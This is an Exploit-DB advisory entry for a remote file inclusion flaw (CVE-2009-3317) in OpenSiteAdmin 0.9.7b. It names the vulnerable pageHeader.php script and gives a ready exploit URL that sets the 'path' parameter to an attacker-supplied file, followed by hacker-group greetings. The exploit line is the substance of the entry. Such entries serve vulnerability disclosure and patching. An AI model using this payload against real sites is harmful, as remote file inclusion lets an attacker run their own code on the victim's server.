OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion

EDB-ID:

9708

CVE:

2009-3317

EDB Verified:

Author:

EA Ngel

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-09-17

Vulnerable App:

                     [#]OpenSiteAdmin 0.9.7 BETA Remote File Include Vulnerability[#]
                        ----------------------------------------------------------



[@]=====================================================================================================[@]
[+] Author	 	 : EA Ngel
[+] Location    	 : Republik Rakyat Indonesia [RRI]
[+] Situs          	 : www[dot]manadocoding[dot]net
[+] Contact        	 : engelpemula[at]gmail[at]com
[+] Download Script	 : http://sourceforge.net/projects/opensiteadmin/files/
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3rr0r Bu9		 : - pageHeader.php
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] 3xpl0it		 : http://127.0.0.1/OpenSiteAdmin/pages/pageHeader.php?path=[thanks.txt?]
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Sp3ci4l Th4nks  	 : str0ke > basix > cr4wl3r > kamuiclone > Mr.C > kamuiclone > cokiki > cyberlog
[+]                        angky_tatoki > doniskynet > rezagmas > g4pt3k > my_wisdom > hmei7 > k3nz0 
[+]		           wishnu > bl4ck_3n91n3 > Mr.Crossbeam > kiddies > yadiyauri > zpy > moon_lee 
[+]		           c6 > and friends
[@]=====================================================================================================[@]



[@]=====================================================================================================[@]
[+] Greetz t00		 : All crew ManadoCoding and All Crew SekuritiOnline
[@]=====================================================================================================[@]


					* GOD BLESS ALL *

# milw0rm.com [2009-09-17]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services